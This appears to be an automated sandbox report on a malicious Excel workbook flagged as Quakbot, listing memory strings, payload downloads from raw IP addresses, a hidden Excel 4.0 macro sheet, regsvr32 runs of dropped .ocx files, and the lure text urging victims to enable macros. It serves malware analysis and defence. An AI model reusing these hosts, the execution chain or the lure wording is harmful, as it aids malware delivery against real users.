    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://wus2.contentsync.
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://www.odwebp.svc.msm
    Source: global trafficHTTP traffic detected: GET /44532.8765170139.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 190.14.37.101Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44532.8765170139.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.138.164.244Connection: Keep-Alive

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 8Screenshot OCR: Enable editing" in the yellow t: above. example of notification ( O PROTECTEDWARNING Thisfileoriq
    Source: Screenshot number: 12Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This fileor
    Source: Screenshot number: 12Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Screenshot number: 12Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
    Found malicious Excel 4.0 MacroShow sources
    Source: ComplaintDetails-1244065104-Nov-17.xlsbMacro extractor: Sheet: Tiposa contains: urlmon
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: ComplaintDetails-1244065104-Nov-17.xlsbInitial sample: EXEC
    Found protected and hidden Excel 4.0 Macro sheetShow sources
    Source: ComplaintDetails-1244065104-Nov-17.xlsbInitial sample: Sheet name: Tiposa
    Source: ComplaintDetails-1244065104-Nov-17.xlsbMacro extractor: Sheet name: Tiposa
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: ComplaintDetails-1244065104-Nov-17.xlsbVirustotal: Detection: 45%
    Source: ComplaintDetails-1244065104-Nov-17.xlsbReversingLabs: Detection: 39%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe ..\Tot1.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe ..\Tot2.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe ..\Tot3.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe ..\Tot1.ocxJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe ..\Tot2.ocxJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe ..\Tot3.ocxJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{31E3DD13-27F4-4AF2-B8C7-B4E0D1E302FA} - OProcSessId.datJump to behavior
    Source: classification engineClassification label: mal92.expl.evad.winXLSB@7/6@0/3
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: ComplaintDetails-1244065104-Nov-17.xlsbInitial sample: OLE zip file path = xl/media/image1.jpg
    Source: 74E50000.0.drInitial sample: OLE zip file path = xl/media/image1.jpg
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: EXCEL.EXE, 00000000.00000003.975696190.000000000F06B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885647644.000000000F1D8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.981208591.000000000F1DD000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.847975213.000000000F1D8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.846255300.000000000F1D8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.980076150.000000000D342000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844416194.000000000F1D8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792485042.000000000F06B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.831097554.000000000F1D8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.980824455.000000000F06B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.830040701.000000000F1D8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728182877.000000000F1D8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792243288.000000000F1D8000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
    Source: EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
    Source: Yara matchFile source: app.xml, type: SAMPLE
    Source: EXCEL.EXE, 00000000.00000002.978109379.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: Program Manager
    Source: EXCEL.EXE, 00000000.00000002.978109379.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: EXCEL.EXE, 00000000.00000002.978109379.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: Progman
    Source: EXCEL.EXE, 00000000.00000002.978109379.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: Progmanlock

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting3DLL Side-Loading1Process Injection2Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Extra Window Memory Injection1Process Injection2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting3NTDSSystem Information Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    ComplaintDetails-1244065104-Nov-17.xlsb46%VirustotalBrowse
    ComplaintDetails-1244065104-Nov-17.xlsb6%MetadefenderBrowse
    ComplaintDetails-1244065104-Nov-17.xlsb39%ReversingLabsDocument-Office.Backdoor.Quakbot

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://substrate.office.comI90%Avira URL Cloudsafe
    http://185.138.164.244/6%VirustotalBrowse
    http://185.138.164.244/0%Avira URL Cloudsafe
    https://cdn.entity.0%URL Reputationsafe
    https://login.m0%Avira URL Cloudsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    http://185.81.114.236/5563209-4053062332-10020%Avira URL Cloudsafe
    http://schemas.open0%URL Reputationsafe
    http://190.14.37.101/44532.8765170139.datc0%Avira URL Cloudsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://login.wind0%Avira URL Cloudsafe
    http://185.81.114.236/44532.8765170139.dat_0%Avira URL Cloudsafe
    http://190.14.37.101/44532.8765170139.datS0%Avira URL Cloudsafe
    http://190.14.37.101/44532.8765170139.datO0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://substrate.office.coml0%Avira URL Cloudsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://api.addins.store.officeppe.com/addinstemplatebW0%Avira URL Cloudsafe
    http://190.14.37.101/53321935-2125563209-4053062332-1002y0%Avira URL Cloudsafe
    https://management.azure.comh0%Avira URL Cloudsafe
    https://substrate.office.comc0%Avira URL Cloudsafe
    https://ncus.contentsync.0%URL Reputationsafe
    http://190.14.37.101/A0%Avira URL Cloudsafe
    https://substrate.office.comP0%URL Reputationsafe
    https://outlook.office.comR870%Avira URL Cloudsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://login.mcro0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://shell.suite.office.com:1443EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728506712.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
      		high
      https://substrate.office.comI9EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://185.138.164.244/EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmptrue
      • 6%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://autodiscover-s.outlook.com/EXCEL.EXE, 00000000.00000003.712956120.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844792206.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.980144579.000000000D3B2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656130823.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885932857.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.830927828.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843000292.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728531297.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792438393.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829149171.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843806955.0000000012A43000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
        		high
        https://graph.ppe.windows.net/w6EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
          		high
          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrEXCEL.EXE, EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
            		high
            https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeeEXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmpfalse
              		high
              https://cdn.entity.630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
              • URL Reputation: safe
              		unknown
              https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                		high
                https://login.mEXCEL.EXE, 00000000.00000003.792419093.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886851258.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829883976.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.842980218.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728506712.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.982109381.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843787373.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975647498.0000000012A2B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.847529633.0000000012A13000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://rpsticket.partnerservices.getmicrosoftkey.comEXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                • URL Reputation: safe
                		unknown
